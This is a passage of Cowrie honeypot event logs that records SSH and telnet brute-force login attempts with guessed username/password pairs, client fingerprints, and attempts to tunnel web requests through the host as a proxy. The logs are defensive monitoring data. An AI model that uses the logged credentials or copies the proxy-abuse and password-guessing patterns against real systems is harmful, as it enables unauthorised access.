.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.678953Z","src_ip":"212.227.125.160","session":"6e29ba96116b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":10805,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10805","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.756565Z","session":"3f52facca56c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.806921Z","src_ip":"77.83.207.83","session":"3f52facca56c"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer1","message":"login attempt [sawyer/sawyer1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.823343Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":1896,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1896","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.948665Z","session":"3f52facca56c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.999051Z","src_ip":"77.83.207.83","session":"3f52facca56c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.050598Z","src_ip":"77.83.207.83","session":"3f52facca56c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28575,"dst_ip":"1.2.3.4","dst_port":22,"session":"168885cd4461","protocol":"ssh","message":"New connection: 77.83.207.83:28575 (1.2.3.4:22) [session: 168885cd4461]","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.100624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.102698Z","src_ip":"77.83.207.83","session":"168885cd4461"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.154296Z","src_ip":"77.83.207.83","session":"168885cd4461"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.410329Z","src_ip":"77.83.207.83","session":"168885cd4461"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25214,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25214","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.462568Z","session":"168885cd4461"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.514061Z","src_ip":"77.83.207.83","session":"168885cd4461"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22895,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22895","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.657810Z","session":"168885cd4461"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.709243Z","src_ip":"77.83.207.83","session":"168885cd4461"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":21735,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21735","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.853656Z","session":"168885cd4461"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.905214Z","src_ip":"77.83.207.83","session":"168885cd4461"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer123","message":"login attempt [sawyer/sawyer123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.955920Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:05.957243Z","src_ip":"77.83.207.83","session":"168885cd4461"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28675,"dst_ip":"1.2.3.4","dst_port":22,"session":"b956bdf2a178","protocol":"ssh","message":"New connection: 77.83.207.83:28675 (1.2.3.4:22) [session: b956bdf2a178]","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.008850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.009775Z","src_ip":"77.83.207.83","session":"b956bdf2a178"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.062747Z","src_ip":"77.83.207.83","session":"b956bdf2a178"}
{"eventid":"cowrie.session.closed","duration":12.77479887008667,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.122403Z","src_ip":"212.227.235.229","session":"b8a323683ee8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"19.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 19.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.285422Z","src_ip":"212.227.235.229","session":"9cb77ceeb8d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.323600Z","src_ip":"77.83.207.83","session":"b956bdf2a178"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60986,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f03b351b27d","protocol":"telnet","message":"New connection: 212.227.235.229:60986 (1.2.3.4:23) [session: 0f03b351b27d]","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.352173Z"}
{"eventid":"cowrie.session.closed","duration":"65.8","message":"Connection lost after 65.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.369409Z","src_ip":"212.227.235.229","session":"9cb77ceeb8d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21892,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21892","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.376661Z","session":"b956bdf2a178"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.428911Z","src_ip":"77.83.207.83","session":"b956bdf2a178"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":26628,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26628","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.574531Z","session":"b956bdf2a178"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.626821Z","src_ip":"77.83.207.83","session":"b956bdf2a178"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24558,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24558","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.774611Z","session":"b956bdf2a178"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.826922Z","src_ip":"77.83.207.83","session":"b956bdf2a178"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.880582Z","src_ip":"77.83.207.83","session":"b956bdf2a178"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28777,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7176b5a5fda","protocol":"ssh","message":"New connection: 77.83.207.83:28777 (1.2.3.4:22) [session: d7176b5a5fda]","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.930477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.940867Z","src_ip":"77.83.207.83","session":"d7176b5a5fda"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.981725Z","src_ip":"77.83.207.83","session":"d7176b5a5fda"}
{"eventid":"cowrie.login.failed","username":"master","password":"123456789","message":"login attempt [master/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:06.991662Z","src_ip":"212.227.125.160","session":"6e29ba96116b"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer1234","message":"login attempt [sawyer/sawyer1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.088641Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.235463Z","src_ip":"77.83.207.83","session":"d7176b5a5fda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13438,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13438","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.287278Z","session":"d7176b5a5fda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.338280Z","src_ip":"77.83.207.83","session":"d7176b5a5fda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":31185,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31185","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.481210Z","session":"d7176b5a5fda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.532532Z","src_ip":"77.83.207.83","session":"d7176b5a5fda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":174,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:174","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.677207Z","session":"d7176b5a5fda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.727933Z","src_ip":"77.83.207.83","session":"d7176b5a5fda"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.779605Z","src_ip":"77.83.207.83","session":"d7176b5a5fda"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28895,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d0ca0456cdb","protocol":"ssh","message":"New connection: 77.83.207.83:28895 (1.2.3.4:22) [session: 2d0ca0456cdb]","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.828220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.829126Z","src_ip":"77.83.207.83","session":"2d0ca0456cdb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:07.878852Z","src_ip":"77.83.207.83","session":"2d0ca0456cdb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.126195Z","src_ip":"77.83.207.83","session":"2d0ca0456cdb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14685,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14685","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.176727Z","session":"2d0ca0456cdb"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer12345","message":"login attempt [sawyer/sawyer12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.221890Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.226443Z","src_ip":"77.83.207.83","session":"2d0ca0456cdb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":6762,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6762","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.367865Z","session":"2d0ca0456cdb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.417484Z","src_ip":"77.83.207.83","session":"2d0ca0456cdb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":4678,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4678","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.559855Z","session":"2d0ca0456cdb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.609667Z","src_ip":"77.83.207.83","session":"2d0ca0456cdb"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.628761Z","src_ip":"212.227.125.160","session":"6e29ba96116b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.660056Z","src_ip":"77.83.207.83","session":"2d0ca0456cdb"}
